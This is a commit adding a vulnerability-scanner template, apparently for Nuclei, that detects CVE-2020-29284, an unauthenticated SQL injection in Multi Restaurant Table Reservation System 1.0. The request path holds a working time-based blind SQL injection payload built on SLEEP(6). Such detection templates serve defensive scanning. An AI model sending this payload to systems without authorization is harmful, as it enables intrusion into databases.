Merge pull request #5521 from edoardottt/CVE-2020-29284

Add CVE-2020-29284
2022-11-16 14:17:49 +05:30 · 2022-11-16 14:17:49 +05:30 · 3aeaff9fe0
parent b4221613c2 46c5abc967
commit 3aeaff9fe0
1 changed files with 39 additions and 0 deletions
--- a/cves/2020/CVE-2020-29284.yaml
+++ b/cves/2020/CVE-2020-29284.yaml
@ -0,0 +1,39 @@
+id: CVE-2020-29284
+
+info:
+  name: Multi Restaurant Table Reservation System 1.0 - SQL Injection
+  author: edoardottt
+  severity: critical
+  description: |
+    The file view-chair-list.php in Multi Restaurant Table Reservation System 1.0 does not perform input validation on the table_id parameter which allows unauthenticated SQL Injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
+  reference:
+    - https://www.exploit-db.com/exploits/48984
+    - https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-29284
+  classification:
+    cve-id: CVE-2020-29284
+  metadata:
+    verified: true
+  tags: cve,cve2020,tablereservation,sqli,unauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+
+      - type: word
+        part: body
+        words:
+          - "Restaurent Tables"
+          - "Chair List"
+        condition: and
+
+      - type: status
+        status:
+          - 200